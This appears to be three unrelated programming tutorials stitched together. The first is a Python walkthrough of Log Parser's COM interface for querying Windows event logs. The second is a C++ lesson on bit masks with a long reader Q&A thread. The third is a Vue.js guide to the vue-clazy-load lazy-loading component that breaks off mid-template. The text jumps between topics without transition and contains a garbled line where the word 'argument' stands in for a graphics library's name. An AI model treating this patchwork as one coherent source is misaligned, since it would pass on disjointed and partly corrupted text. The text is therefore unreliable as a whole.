Looking in the Log Parser help file, it documents a COM interface, which gives us our way in. Before you can use the COM interface you must register the DLL with the following command:
regsvr32 LogParser.dll
All the examples are in VBScript, unsurprisingly, but we can adapt them with a bit of trial and error. The first item of interest is the name of the COM object, MSUtil.LogQuery. Now we know what to pass to the Dispatch method. If you have used a library that conforms to the Python database API, think of this as the connect method.
Next comes the two ways of working, batch or interactive. Interactive seems the most natural place to start so we need to use the Execute method. This takes the SQL-like query and optionally the input format. We’ll leave it to guess the input format for this test.
The execute method returns a LogRecordSet. Here is where the VBScript example helps. This is an interface to a set of records (obviously) and allows us to find out the columns and get the records. At a stretch you can think of it as a cursor. Putting all this together, we can query the System event log to find out all the times the computer was switched on (Event ID 12) with the following code:
import win32com.client

lp = win32com.client.Dispatch("MSUtil.LogQuery")
sql = "SELECT * FROM System WHERE EventID = 12"
lrs = lp.Execute(sql)
for col in range(lrs.getColumnCount()):
    print col, lrs.getColumnName(col)
Now that we have the result of the query in the record set, we need to get at the values. We can get each record sequentially using the record set interface. This returns a LogRecord object which basically just allows you to get each value by specifying the index you want. The example above gives us two columns we could use; I'll use the TimeGenerated one. So let's display them:
# continuing on from above
while not lrs.atEnd():
    lr = lrs.getRecord()
    print "Computer started at", lr.getValue(2)
    lrs.moveNext()
With a working COM interface, I wrote the following program to allow the SQL statements to be run from the command line in an interactive environment. The output formatting is poor but it makes a good example program.
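A minimal sketch of such an interactive loop, using the same MSUtil.LogQuery interface as above (the prompt text and loop structure are assumptions, not the original program):

# Hypothetical interactive shell for Log Parser queries (Python 2 era).
import win32com.client

lp = win32com.client.Dispatch("MSUtil.LogQuery")
while True:
    sql = raw_input("logparser> ")
    if sql.lower() in ("quit", "exit"):
        break
    lrs = lp.Execute(sql)
    cols = [lrs.getColumnName(c) for c in range(lrs.getColumnCount())]
    print "\t".join(cols)
    while not lrs.atEnd():
        lr = lrs.getRecord()
        print "\t".join(str(lr.getValue(c)) for c in range(len(cols)))
        lrs.moveNext()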
In the previous lesson on bitwise operators (O.2 -- Bitwise operators), we discussed how the various bitwise operators apply logical operators to each bit within the operands. Now that we understand how they function, let’s take a look at how they’re more commonly used.
Bit masks
In order to manipulate individual bits (e.g. turn them on or off), we need some way to identify the specific bits we want to manipulate. Unfortunately, the bitwise operators don’t know how to work with bit positions. Instead they work with bit masks.
A bit mask is a predefined set of bits that is used to select which specific bits will be modified by subsequent operations.
Consider a real-life case where you want to paint a window frame. If you're not careful, you risk painting not only the window frame, but also the glass itself. You might buy some masking tape and apply it to the glass and any other parts you don't want painted. Then when you paint, the masking tape blocks the paint from reaching anything you don't want painted. In the end, only the non-masked parts (the parts you want painted) get painted.
Because C++14 supports binary literals, defining these bit masks is easy:
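For example (a sketch; the mask0 through mask7 names match the ones used in the comments below):

#include <cstdint>

constexpr std::uint_fast8_t mask0{ 0b0000'0001 }; // represents bit 0
constexpr std::uint_fast8_t mask1{ 0b0000'0010 }; // represents bit 1
constexpr std::uint_fast8_t mask2{ 0b0000'0100 }; // represents bit 2
constexpr std::uint_fast8_t mask3{ 0b0000'1000 }; // represents bit 3
constexpr std::uint_fast8_t mask4{ 0b0001'0000 }; // represents bit 4
constexpr std::uint_fast8_t mask5{ 0b0010'0000 }; // represents bit 5
constexpr std::uint_fast8_t mask6{ 0b0100'0000 }; // represents bit 6
constexpr std::uint_fast8_t mask7{ 0b1000'0000 }; // represents bit 7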
Now we have a set of symbolic constants that represents each bit position. We can use these to manipulate the bits (which we’ll show how to do in just a moment).
Defining bit masks in C++11 or earlier: because binary literals aren't available there, you can define the masks with hexadecimal literals instead (see lesson 4.13 -- Literals for a refresher on hexadecimal).
This can be a little hard to read. One way to make it easier is to use the left-shift operator to shift a bit into the proper location:
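For instance (a sketch using the same mask names):

constexpr std::uint_fast8_t mask0{ 1 << 0 }; // 0000 0001
constexpr std::uint_fast8_t mask1{ 1 << 1 }; // 0000 0010
constexpr std::uint_fast8_t mask2{ 1 << 2 }; // 0000 0100
constexpr std::uint_fast8_t mask3{ 1 << 3 }; // 0000 1000
constexpr std::uint_fast8_t mask4{ 1 << 4 }; // 0001 0000
constexpr std::uint_fast8_t mask5{ 1 << 5 }; // 0010 0000
constexpr std::uint_fast8_t mask6{ 1 << 6 }; // 0100 0000
constexpr std::uint_fast8_t mask7{ 1 << 7 }; // 1000 0000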
Testing a bit (to see if it is on or off)
Now that we have a set of bit masks, we can use these in conjunction with a bit flag variable to manipulate our bit flags.
To determine if a bit is on or off, we use bitwise AND in conjunction with the bit mask for the appropriate bit:
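A sketch of how this could look (assuming the masks above and an 8-bit flags variable):

#include <cstdint>
#include <iostream>

int main()
{
    std::uint_fast8_t flags{ 0b0000'0101 }; // 8 bits in size means room for 8 flags

    std::cout << "bit 0 is " << ((flags & mask0) ? "on\n" : "off\n");
    std::cout << "bit 1 is " << ((flags & mask1) ? "on\n" : "off\n");

    return 0;
}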
This prints:
bit 0 is on
bit 1 is off
Setting a bit
To set (turn on) a bit, we use bitwise OR equals (operator |=) in conjunction with the bit mask for the appropriate bit:
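For example (a sketch continuing with the same flags variable, initially 0b0000'0101):

std::cout << "bit 1 is " << ((flags & mask1) ? "on\n" : "off\n");
flags |= mask1; // turn on bit 1
std::cout << "bit 1 is " << ((flags & mask1) ? "on\n" : "off\n");

This prints: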
bit 1 is off
bit 1 is on
We can also turn on multiple bits at the same time using Bitwise OR:
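For example:

flags |= (mask4 | mask5); // turn bits 4 and 5 on at the same time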
Resetting a bit
To clear a bit (turn off), we use Bitwise AND and Bitwise NOT together:
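For example (a sketch, again starting from flags 0b0000'0101):

std::cout << "bit 2 is " << ((flags & mask2) ? "on\n" : "off\n");
flags &= ~mask2; // turn off bit 2
std::cout << "bit 2 is " << ((flags & mask2) ? "on\n" : "off\n");

This prints: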
bit 2 is on
bit 2 is off
We can turn off multiple bits at the same time:
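For example:

flags &= ~(mask4 | mask5); // turn bits 4 and 5 off at the same time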
Flipping a bit
To toggle a bit state, we use Bitwise XOR:
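For example (a sketch, starting from flags 0b0000'0101):

std::cout << "bit 2 is " << ((flags & mask2) ? "on\n" : "off\n");
flags ^= mask2; // flip bit 2
std::cout << "bit 2 is " << ((flags & mask2) ? "on\n" : "off\n");
flags ^= mask2; // flip bit 2 again
std::cout << "bit 2 is " << ((flags & mask2) ? "on\n" : "off\n");

This prints: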
bit 2 is on
bit 2 is off
bit 2 is on
We can flip multiple bits simultaneously:
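For example:

flags ^= (mask4 | mask5); // flip bits 4 and 5 at the same time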
Bit masks and std::bitset
std::bitset supports the full set of bitwise operators. So even though it’s easier to use the functions (test, set, reset, and flip) to modify individual bits, you can use bitwise operators and bit masks if you want.
Why would you want to? The functions only allow you to modify individual bits. The bitwise operators allow you to modify multiple bits at once.
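A sketch using std::bitset masks (the mask names as above, redefined as std::bitset<8>), consistent with the output that follows:

#include <bitset>
#include <iostream>

int main()
{
    constexpr std::bitset<8> mask1{ 0b0000'0010 }; // represents bit 1
    constexpr std::bitset<8> mask2{ 0b0000'0100 }; // represents bit 2
    std::bitset<8> flags{ 0b0000'0101 };

    std::cout << "bit 1 is " << (flags.test(1) ? "on\n" : "off\n");
    std::cout << "bit 2 is " << (flags.test(2) ? "on\n" : "off\n");

    flags ^= (mask1 | mask2); // flip bits 1 and 2
    std::cout << "bit 1 is " << (flags.test(1) ? "on\n" : "off\n");
    std::cout << "bit 2 is " << (flags.test(2) ? "on\n" : "off\n");

    flags |= (mask1 | mask2); // turn bits 1 and 2 on
    std::cout << "bit 1 is " << (flags.test(1) ? "on\n" : "off\n");
    std::cout << "bit 2 is " << (flags.test(2) ? "on\n" : "off\n");

    flags &= ~(mask1 | mask2); // turn bits 1 and 2 off
    std::cout << "bit 1 is " << (flags.test(1) ? "on\n" : "off\n");
    std::cout << "bit 2 is " << (flags.test(2) ? "on\n" : "off\n");

    return 0;
}

This prints: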
bit 1 is off
bit 2 is on
bit 1 is on
bit 2 is off
bit 1 is on
bit 2 is on
bit 1 is off
bit 2 is off
Making bit masks meaningful
Naming our bit masks “mask1” or “mask2” tells us what bit is being manipulated, but doesn’t give us any indication of what that bit flag is actually being used for.
A best practice is to give your bit masks useful names as a way to document the meaning of your bit flags. Here’s an example from a game we might write:
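For example (a sketch; the exact list of state names is an assumption, matching the ones referenced in the comments below):

#include <cstdint>
#include <iostream>

int main()
{
    // Define a bunch of physical/emotional states
    constexpr std::uint_fast8_t isHungry{   1 << 0 };
    constexpr std::uint_fast8_t isSad{      1 << 1 };
    constexpr std::uint_fast8_t isMad{      1 << 2 };
    constexpr std::uint_fast8_t isHappy{    1 << 3 };
    constexpr std::uint_fast8_t isLaughing{ 1 << 4 };

    std::uint_fast8_t me{}; // all flags/options turned off to start

    me |= (isHappy | isLaughing); // I am happy and laughing
    me &= ~isLaughing;            // I am no longer laughing

    // Query a few states
    std::cout << "Am I happy? " << static_cast<bool>(me & isHappy) << '\n';
    std::cout << "Am I laughing? " << static_cast<bool>(me & isLaughing) << '\n';

    return 0;
}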
Here’s the same example implemented using std::bitset:
Two notes here: First, std::bitset doesn't have a nice function that allows you to query bits using a bit mask. So if you want to use bit masks rather than positional indexes, you'll have to use bitwise AND to query bits. Second, we make use of the any() function, which returns true if any bits are set and false otherwise, to see if the bit we queried remains on or off.
When are bit flags most useful?
Astute readers may note that the above examples don't actually save any memory. 8 booleans would normally take 8 bytes. But the examples above use 9 bytes: 8 bytes to define the bit masks, and 1 byte for the flag variable!
Bit flags make the most sense when you have many identical flag variables. For example, in the example above, imagine that instead of having one person (me), you had 100. If you used 8 Booleans per person (one for each possible state), you'd use 800 bytes of memory. With bit flags, you'd use 8 bytes for the bit masks, and 100 bytes for the bit flag variables, for a total of 108 bytes of memory.
There’s another case where bit flags and bit masks can make sense. argument, a well regarded 3d graphic library, opted to use bit flag parameters instead of many consecutive Boolean parameters.
Here’s a sample function call from OpenGL:
GL_COLOR_BUFFER_BIT and GL_DEPTH_BUFFER_BIT are bit masks defined as follows (in gl2.h):
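They are single-bit hexadecimal constants (values as found in a typical gl2.h):

#define GL_DEPTH_BUFFER_BIT   0x00000100
#define GL_STENCIL_BUFFER_BIT 0x00000400
#define GL_COLOR_BUFFER_BIT   0x00004000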
Bit masks involving multiple bits
Although bit masks are often used to select a single bit, they can also be used to select multiple bits. Let's take a look at a slightly more complicated example where we do this: a program that asks the user to enter a 32-bit hexadecimal RGBA color value and then extracts the 8-bit red, green, blue, and alpha components.
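A sketch of such a program (the masks, shifts, and casts match the behavior discussed in the comments below; prompt wording is illustrative):

#include <cstdint>
#include <iostream>

int main()
{
    constexpr std::uint_fast32_t redBits{   0xFF000000 };
    constexpr std::uint_fast32_t greenBits{ 0x00FF0000 };
    constexpr std::uint_fast32_t blueBits{  0x0000FF00 };
    constexpr std::uint_fast32_t alphaBits{ 0x000000FF };

    std::cout << "Enter a 32-bit RGBA color value in hexadecimal (e.g. FF7F3300): ";
    std::uint_fast32_t pixel{};
    std::cin >> std::hex >> pixel; // std::hex parses the input as hexadecimal

    // Isolate each component with bitwise AND, then shift it into the low 8 bits.
    const std::uint_fast8_t red{   static_cast<std::uint_fast8_t>((pixel & redBits) >> 24) };
    const std::uint_fast8_t green{ static_cast<std::uint_fast8_t>((pixel & greenBits) >> 16) };
    const std::uint_fast8_t blue{  static_cast<std::uint_fast8_t>((pixel & blueBits) >> 8) };
    const std::uint_fast8_t alpha{ static_cast<std::uint_fast8_t>(pixel & alphaBits) };

    std::cout << "Your color contains:\n";
    std::cout << std::hex; // print the components in hex, as entered
    // cast to int so the values print as numbers rather than characters
    std::cout << static_cast<int>(red)   << " red\n";
    std::cout << static_cast<int>(green) << " green\n";
    std::cout << static_cast<int>(blue)  << " blue\n";
    std::cout << static_cast<int>(alpha) << " alpha\n";

    return 0;
}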
Summary
Summarizing how to set, clear, toggle, and query bit flags:
To query bit states, we use bitwise AND:
To set bits (turn on), we use bitwise OR:
To clear bits (turn off), we use bitwise AND with bitwise NOT:
To flip bit states, we use bitwise XOR:
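Collected as code (assuming a flags variable and a mask):

if (flags & mask) ...  // query: is the masked bit set?
flags |= mask;         // set (turn on)
flags &= ~mask;        // clear (turn off)
flags ^= mask;         // flip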
Quiz time
Question #1
Do not use std::bitset in this quiz. We’re only using std::bitset for printing.
std::bitset
Given the following program:
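The quiz program is along these lines (a sketch; the option values are assumptions, chosen to be consistent with the expected outputs and the names used in the comments):

#include <cstdint>
#include <iostream>
#include <bitset>

int main()
{
    constexpr std::uint_fast8_t option_viewed{    0b0000'0001 };
    constexpr std::uint_fast8_t option_edited{    0b0000'0010 };
    constexpr std::uint_fast8_t option_favorited{ 0b0000'0100 };
    constexpr std::uint_fast8_t option_shared{    0b0000'1000 };
    constexpr std::uint_fast8_t option_deleted{   0b0001'0000 };

    std::uint_fast8_t myArticleFlags{ option_favorited };

    // your quiz answers go here

    std::cout << std::bitset<8>{ myArticleFlags } << '\n';

    return 0;
}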
a) Write a line of code to set the article as viewed.
Expected output:
00000101
b) Write a line of code to check if the article was deleted.
c) Write a line of code to clear the article as a favorite.
Expected output (Assuming you did quiz (a)):
00000001
d) Extra credit: why are the following two lines identical?
~(option4 | option5)
~option4 & ~option5
Never mind I can't see.
Can I use enum to define bit masks? Does using enum allow to save memory? Does it have any other weakness?
Hi, Nascardriver and Alex
TBH, I'm quite having a little hard time in understanding this chapter.
Particularly in how the bitmask and bitwise operator work...
I mean, for example, how the (flags & mask) expression can produce true/false state rather than modified binary value, just like what we've learned in previous lesson.
Can you please give me more explanation about that? Because i'm truly stuck on that part.
Thanks so much, man
`flags & mask` returns an integer. Integers are convertible to `bool`. Any non-zero integer is `true`, 0 is `false`.
Yeah, it's already clear for me that (flag & mask) expression returns 1 or 0 value, which is then converted to bool value.
But what i'm asking here is HOW? Because from what i learn in previous lesson (about bitwise operator), if we compare two binary values with AND/OR operator, it should returns / produces new combination of binary value, NOT just a single integer value ( 0 or 1)
Or perhaps am i missing something or understanding these topics wrong way here?
Can you help me please? Thanks before, man
> it's already clear for me that (flag & mask) expression returns 1 or 0
It doesn't, it returns the first value ANDed with the second. The result is 0 if `flags` and `mask` didn't have any bits in common, otherwise the result is non-zero.
Extremely helpful comment, thanks!
Hey guys just needed help again because its getting harder and harder as the chapters move on.
so the way i understand it is that since the smallest size of a variable is 1 byte we make use of the bits in a byte to store 8 Boolean values in 1 variable.
but isn't this also going to use up 1 byte for each mask we create ?
constexpr std::bitset<8> mask0{ 0b0000'0001 }; // represents bit 0 isnt mask0 going to take up 1 byte ?
constexpr std::bitset<8> mask1{ 0b0000'0010 }; // represents bit 1 isnt mask1 going to take up 1 byte too ?
constexpr std::bitset<8> mask2{ 0b0000'0100 }; // represents bit 2
constexpr std::bitset<8> mask3{ 0b0000'1000 }; // represents bit 3
constexpr std::bitset<8> mask4{ 0b0001'0000 }; // represents bit 4
constexpr std::bitset<8> mask5{ 0b0010'0000 }; // represents bit 5
constexpr std::bitset<8> mask6{ 0b0100'0000 }; // represents bit 6
constexpr std::bitset<8> mask7{ 0b1000'0000 }; // represents bit 7 so in total we created 8 variables each a 1 byte variable ?
so if i create a separate 1byte integer type for a single Boolean variable it doesn't make a difference in memory space ?
You can reuse the masks for an infinite amount of flag variables
ah i see.. thanks very much.
although , in an attempt to make our bit mask meaningful we do this
// Define a bunch of physical/emotional states
doesn't this mean that each mask is now specific to a single byte size variable and would now not make sense if used on a second single byte variable with different meanings ?
like say 1 byte variables characterStatus and carStatus ... its now senseless to use isHappy for carStatus..
EDIT : never mind im stupid. all is explained further down below in the "When are bit flags most useful?" section. i just had to read further. sorry
`mask1`, `mask2`, etc. are meaningless and shouldn't occur in the wild. `isHungry` etc. is a real example.
You can't mix `characterStatus` and `carStatus`. But you might have more than 1 character or more than 1 car.
Even if you only have 1 character or 1 car, you'll save memory when you need to serialize the value, eg. when sending the value over the network or writing it to a file.
If you know that you'll only have 1 of these values and you'll never need to serialize it in a memory-friendly way, using a `bool` for each option is the easier solution.
Never mind I'm stupid, you already found it. I just had to read further :D
thanks ! haha :D
May I suggest to remove the std::cout << std::hex; line from the RGBA example?
I think it's redundant to show the result in hex, since thats exactly what we input in first place. It's a lot more interesting to show the unsigned integer of each color:
FF7F3300 is composed of:
255 red
127 green
51 blue
0 alpha
Another great lesson!
1. Line 17 in the code block in section "Making bit masks meaningful":
`isHappy | isLaughing` should be between parentheses for consistency with previous examples. Same goes for line 18 in the next code block.
2. In section "When are bit flags most useful?"
> you have to remember which parameters corresponds to which option
I think "correspond" should be used instead, but I'm not 100% sure.
3. Question #1
> Do not use std::bitset in this quiz. We’re only using std::bitset to for printing.
I don't think "to" should be here.
Visual Studio tip:
Hold Ctrl + Alt and click somewhere to create a new cursor/caret. This will let you make edits in multiple places at once. Useful for creating bitmask const variables with binary literals.
Can you explain how this code works?
Pixel is a 32-bit variable where the user has inserted some value. The variables redBits, greenBits, blueBits and alphaBits are 8-bit bit masks that are used to select specific bits from pixel. When we say e.g. pixel & redBits, we choose the top 8 bits of the variable named pixel, because those are what the mask redBits corresponds to. The shifting operation >> is done because we need the bits to be in the rightmost positions of the unsigned integers so that we can represent them as hexadecimal values correctly, so the leftmost 8 bits in positions 24-31 are shifted 24 steps to the right, etc. Otherwise after the & operation we would have FF000000, which is not what we wanted.
Hello! Could you please explain following example in a little bit more details as i am getting confused at some parts. I will list what i need additional support with below the example.
1. How would you brace initialize RGBA variables using static cast? Just one example on "red" and why you want to avoid using static cast? More complicated?
2. You are using std::hex to print values in hex at the end and using static cast <int> as well. Could you explain why exactly we have to use static cast <int> to display RGBA variables? Is it because these values are currently set in binary? But even though they are in binary, why i cannot just use std::cout<<std::hex and then std::cout<<red<<"red\n"? Doing so i am expecting binary "red" to be automatically converted to hex "red" because i am using std::cout<<std::hex prior to print "red" variable. Am i am missing something from lessons about conversion and printing values in different numerical systems?
Thanks for the answer in advance
1. Neither `auto` nor `static_cast` were fully introduced yet, that's probably why the `static_cast` was avoided here. I've updated the example to use the `static_cast` anyway, because it's used elsewhere too, even though the code gets messy without `auto`.
2. The variables being printed are `std::uint_fast8_t`, which might be an `unsigned char`. If that's the case, `std::cout` would interpret them as characters, not numbers. The numbering system you use doesn't affect the value. Numbering systems are merely an aid for humans. For a computer, everything is binary. Saying "a value is set in binary" doesn't make sense.
Many thanks, it is all clear now!
Is it fine to write this line of code below for question #1 b) ?
(myArticleFlags & option_deleted) ? (std::cout << "The article has been deleted.") : (std::cout << "The article has not been deleted.");
The conditional operator should only be used if you need the return value of the expressions. If you don't need the return value, use an if-statement.
1. any()
Is there an explaination for it? It just pops up out of the blue at the end of the example.
2. For Question 1a)
Could you kindly show what the output is in the console?
With your code, I got a smiley face. ☺☺☺
With my code, I got a 1.
1. The explanation is in the paragraph after the example.
2. The output is implementation-defined, because `std::uint_fast8_t` is an implementation-defined type. If `std::uint_fast8_t` is an `unsigned char`, the output should be a SOH (Start of Heading) character (invisible). If it is another integer type, the output should be 1. I don't know how you managed to get a smiley face. If your `std::uint_fast8_t` is an `unsigned char`, `(myArticleFlags | option_viewed)` promotes the result to an `int` or `unsigned int`, which is why you can get different results compared to printing `myArticleFlags`.
Hi, do you have an email?
I'll snapshot the smileyface and email it to you.
I assume the answer should be 0x01.
Could you print out the answer and add it to Quiz 1a)?
I'm not sure if I'm doing it correctly if I see a smiley face appear as the answer.
Seeing the smiley won't help me. The smiley you posted is "\u263a", very much not what the value of `myArticleFlags` should be. If you want to print the value as an integer, you can use `std::cout << static_cast<int>(myArticleFlags) << '\n';`.
I've added expected outputs to quiz (a) and (c), thanks for the suggestion!
Hello!
May i ask why in all your examples you use uint_fast8_t, while in previous lessons it was shown as the best practice to avoid using 8 bit integers since C++ may consider them as chars?
You said:
"We use 0s to mask out the bits we don’t care about, and 1s to denote the bits we want modified."
Where do you use 0s in this lesson to "mask out" bits and 1s to "denote bits"? And how does 0s and 1s mask out or in bits?
You said that "cstdint" probably stands for "standard integer" that’s what I knew but what I don’t know is what does the "c" stand for?
#include <c...> means that we include the C++ version of a "....h" C library.
Thus,
#include <cstdint> means we include the C++ version of the stdint.h library.
Cannot reply to comments, also there’s no timer to edit a comment.
How does flags "|= mask1" turn on a bit?
"standard integer" probably.
There are many `flags` on this page. The `flags` in "Summary" assumes there is a `flags` bitset or integer, it doesn't matter.
I don't know what the "c" stands for. It might mean that the header originates from C. eg. cstdint is stdint.h in C.
Can you explain How flags "|= mask1" turns on a bit?
`flags |= mask1` is the same as `flags = flags | mask1`
How does "flags = flags | mask1" torn on a bit?
turn*
See lesson O.2 section "Bitwise OR"
I know what bitwise or is and that’s why I’m asking why is it needed an or why not "flags = mask1" ? so it declares flags as mask1 that is on.
`flags = mask1` would override all bits, but you want to set those bits to 1 that are 1 in `mask1` and not touch the others
I don’t get it. What does flags bitwise or equals mask1 mean? More precise: What does or equals mean?
It's like
a += b
which means:
a = a + b
so
flags |= mask1
is the same as
flags = flags | mask1
I suggest you to go at the section "Bitwise assignment operators" of the previous lesson (O.2)
I’m stuck here, can you reply?
I don't know what more to say. I suggest you move on to other lessons and come back to bitwise operations when you need them.
Let me try to explain this how I understood it.
Let's say
flags = 0101
mask = 0010
flags |= mask is the same as flags = flags|mask
To visualize the procedure like it was done in previous lessons, we can show it like this:
0101 (flags)
OR 0010 (masks)
--------
0111 (new flags)
So the second bit from the right was turned on using the mask.
How is flags |= mask1 the same as flags | mask1 ? = is a assignment and how is flags | assigned to mask1 like flags | mask1 ?
Why is it needed an | (or) to assign flags to mask1 why is it not just flags = mask1?
Because the "=" means assignment: assign the value on the right to the variable on the left. For example, with
flags = 0b0000'0101
and
mask1 = 0b0000'0010
if we do
flags = mask1
the variable "flags" would be 0b0000'0010, whereas if we do
flags |= mask1
which means
flags = flags | mask1
it assigns "flags bitOR mask1" to the variable flags, which means flags = 0b0000'0101 | 0b0000'0010
What does "cstdint" stand for?
And where was flags defined?
We use hexadecimal values only because inputting binary values for all 32 bits is time consuming. Right?
I have a doubt. Maybe it's silly. In the program which asks the user to enter a 32-bit hexadecimal value, and then extracts the 8-bit color values for R, G, B, and A, we assign 0xFF000000 to the red extractor. When the user enters a value, he/she enters a value of 8 bit long. I don't understand this. We are defining 32bit long value and inputting and operating using 8 bit long values.
The user enters 0xFF000000, which is a 32bit value. The program splits this 32bit value into 4 8bit values.
You mean, the limit for the data type is 32 bits? How's FF000000 32 bit value??? It's 8 bits isn't it?
FF is the largest 8bit value. Anything beyond FF doesn't fit into 8 bits.
FF000000 is a 32bit value.
Maybe you're being confused by the trailing zeros. hex(FF000000) is dec(4278190080).
Oh yeah yeah. It's all clear now. Thank you for helping me understand. And I am amazed by the way you keep this website updated and answer every questions asked. May God bless you and your team. Keep helping others✌
Masktape is not the appropriate example to bitmask because it’s the opposite, masking against paint is for the cause to exclude the masked part but with bitmask it’s the cause of using only that bit and excluding all other bits.
thanks
when i finshed the last lesson i did some functions to do set,reset,test,flip
before i know about bit masks
i want to know are my functions is usable or not ?
sorry for bad english
here is my code :
#include <iostream>
#include <bitset>
#define typeOfNumber unsigned char // type of bitflags (should be an unsigned integer)
constexpr char numberOfBits{ 8 }; // should identical with the type above
// to give me the position (i didn't now about the bit masks yet)
int expontaion(int value, int exponent) {
int theResult{ 1 };
for (;exponent > 0;exponent--) {
theResult *= value;
}
return theResult;
}
// set bit to 1
void setBit(typeOfNumber & bitFlags, typeOfNumber position)
{
position = expontaion(2, position);
bitFlags = bitFlags | position;
}
// set bit to 0
void reSetBit(typeOfNumber& bitFlags, typeOfNumber position)
{
position = expontaion(2, position);
if ((bitFlags & position) == position)
bitFlags ^= position;
}
// if bit is 0 set it to 1 (vice versa)
void flipBit(typeOfNumber& bitFlags, typeOfNumber position)
{
position = expontaion(2, position);
bitFlags = bitFlags ^ position;
}
//test bit
typeOfNumber getBit(typeOfNumber bitFlags, typeOfNumber position)
{
bitFlags = bitFlags << (numberOfBits - 1) - position;
bitFlags = bitFlags >>( numberOfBits - 1);
return bitFlags;
}
int main() {
unsigned char infoBitFlags{0b1010'1010};
setBit(infoBitFlags, 0); // set bit position 0 in infoBitFlags to 1
std::cout << std::bitset<8>{infoBitFlags} << '\n'; //this will print 1010'1011
return 0;
}
I don't know what it particularly is but, it feels like I didn't understand something. I even read these chapters a couple of times, thoroughly too, but it still feels like I am not completely sure about it. It might have to do with bits and bytes and values, I don't know. Due to this I have not been able to proceed further...
lmao same
Try subbing in the values and test it out. For example if we test if mask1 is turned on. We can do (flag & mask1)
Subbing in we get:
0000'0101 &
0000'0010
---------
0000'0000
Remember that for '&', both bits have to be true (1). Since the whole byte is false (all bits are 0), we can say that mask1 is turned off.
You may notice the bytes that are turned on have at least 1 true bit for flag & masknumber.
So when we are turning on a bit, we use OR '|', which means at least one or more bits have to be true (1). This guarantees that at least one of the bits will be 1, for example:
flag |= mask1 =
0000'0101 OR
0000'0010
---------
0000'0111 As there is more than one true bit, mask1 is turned on.
Now lets see what we get when we turn off a bit.
From the first example above, we are told that mask2 = 0000'0100 is turned on.
We can turn it off with flag &= ~mask2. Let's see how it works:
~mask2 = 1111'1011.
flag = flag & ~mask2 is:
0000'0101 AND
1111'1011
---------
0000'0000
Since all the bits are 0, we say that mask2 is turned off now.
I might be completely wrong, but this is the way I understood this chapter. Please correct me if I'm wrong in anything.
Hi there, awesome series of lessons you've all got going here, really appreciate the effort that goes into maintaining a site like this, kudos!
I have a question regarding the final example before the summary. As far as I can tell, my code is identical to that provided in the example;
However I keep receiving a compiler warning telling me my green RGBA component variable in main() is being initialized with a 'possible loss of data', implying that the data lost are the zeros resulting from the 16 right bitshifts of (green & greenMask), even though the other component variables all compile with no issue at all. I had to disable treating warnings as errors in order for my program to compile. Suffice to say that it works fine, so I'm just wondering why I am receiving the aforementioned warning? Thanks in advance.
Why are we not using binary numbers here, but a left shift? And how is the value of 1 evaluated?
#include <iostream>
#include <cstdint>
#include <bitset>
int main()
{
constexpr std::uint_fast8_t option1{ 0b0000'0000 };
constexpr std::uint_fast8_t option2{ 0b0000'0001 };
constexpr std::uint_fast8_t option3{ 0b0000'0010 };
constexpr std::uint_fast8_t option4{ 0b0000'0100 };
constexpr std::uint_fast8_t option5{ 0b0000'1000 };
constexpr std::uint_fast8_t option6{ 0b0001'0000 };
constexpr std::uint_fast8_t option7{ 0b0010'0000 };
constexpr std::uint_fast8_t option8{ 0b0100'0000 };
std::uint_fast8_t bitflag{ };
/* constexpr std::bitset<8> option1{ 0b0000'0000};
constexpr std::bitset<8> option2{ 0b0000'0001 };
constexpr std::bitset<8> option3{ 0b0000'0010 };
constexpr std::bitset<8> option4{ 0b0000'0100 };
constexpr std::bitset<8> option5{ 0b0000'1000 };
constexpr std::bitset<8> option6{ 0b0001'0000 };
constexpr std::bitset<8> option7{ 0b0010'0000 };
constexpr std::bitset<8> option8{ 0b0100'0000 };
std::bitset<8> bitflag{};*/ (this one can print out binary number)
bitflag |= option7;
std::cout << bitflag;
return 0;
}
When I used uint_fast8_t, it printed nothing. But if I used bitset, it printed out the binary number. Can I know why it behaved like that, and what the problem is that makes it unable to print when I use uint_fast8_t? (For the information, the compiler does not show any warning or error.)
`std::uint_fast8_t` might be an `unsigned char`. `std::cout <<` treats `char` as characters. Add a cast to `int`.
When I used std::uint_fast16_t, it printed out 32. What should I do if I want to print it in binary (0010'0000), not in decimal (32)? If I use static_cast<int>(bitflag), it is going to print decimal too. Should I make a function to print the binary number?
Either write a function to print binary or cast `bitflag` to a `std::bitset`.
Images are a fun part of web development. They look great, and are incredibly important in almost every app or site, but they’re huge and slow. A common technique of late is that of lazy-loading images when they enter the viewport. That saves a lot of time loading your app, and only loads the images you need to see. There are a number of lazy-loading solutions for Vue.js, but my personal favorite at the moment is vue-clazy-load.
It’s basically a dead-simple wrapper with slots that allows you do display a custom image and a custom placeholder. There’s not much else, but it’s incredibly flexible.
Installation
Install vue-clazy-load in your Vue.js project.
# Yarn
$ yarn add vue-clazy-load

# NPM
$ npm install vue-clazy-load --save
main.js (Partial)
import Vue from 'vue';
import App from 'App.vue';
import VueClazyLoad from 'vue-clazy-load';

...

Vue.use(VueClazyLoad);

...

new Vue({
  el: '#app',
  render: h => h(App)
});
Since vue-clazy-load uses the brand-new IntersectionObserver API, you’ll probably want a polyfill to support it in most browsers. This one works well, but any polyfill that provides the IntersectionObserver API should work.
<script src=""></script>
Usage
Now you can use the <clazy-load></clazy-load> component directly, as shown below.
App.vue
<template>
  <div id="app">
    <!-- The src allows the clazy-load component to know when to display the image. -->
    <!-- (The image URLs below are placeholders; the originals were omitted.) -->
    <clazy-load src="https://example.com/image.png">
      <!-- The image slot renders after the image loads. -->
      <img src="https://example.com/image.png">
      <!-- The placeholder slot displays while the image is loading. -->
      <div slot="placeholder">
        <!-- You can put any component you want in here. -->
        Loading....
      </div>
    </clazy-load>
  </div>
</template>
This will get you a basic div that starts loading once the element enters the viewport, displays Loading… until the image loads, then displays the image. Nice and simple!
There are, of course a few props you can pass:
- src: String (required) - The src of the image to load.
- tag: String - Which component / element clazy-load will render as. (The default is a boring ‘ol div.)
- element: String - Which element to consider as the viewport. Otherwise the browser viewport is used. (Useful if you have a custom scrolling area.)
- threshold: Array<Number> || Number - How far into the viewing area the clazy-load component needs to be before the load is started. See MDN for more details.
- margin: String - A value for the margin that gets applied to the intersection observer.
- ratio: Number - A value between 0 and 1 that corresponds to the percentage of the element that should be in the viewport before loading happens.
- crossorigin: “anonymous” or “use-credentials” - An option to help work with CORS for images hosted on a different domain.
- loadedClass: String, loadingClass: String & errorClass: String - Class name to give to the root element for the different states.
There’s also a single event provided, the load event. Which is, as the name implies, emitted when the image finished loading.
Also of note, you can effectively use any components in the slots, including Vue transition components, as shown below:
<template>
  <div id="app">
    <!-- Boom: Free fade transitions. -->
    <!-- (Image URLs are placeholders; the originals were omitted.) -->
    <clazy-load src="https://example.com/image.png">
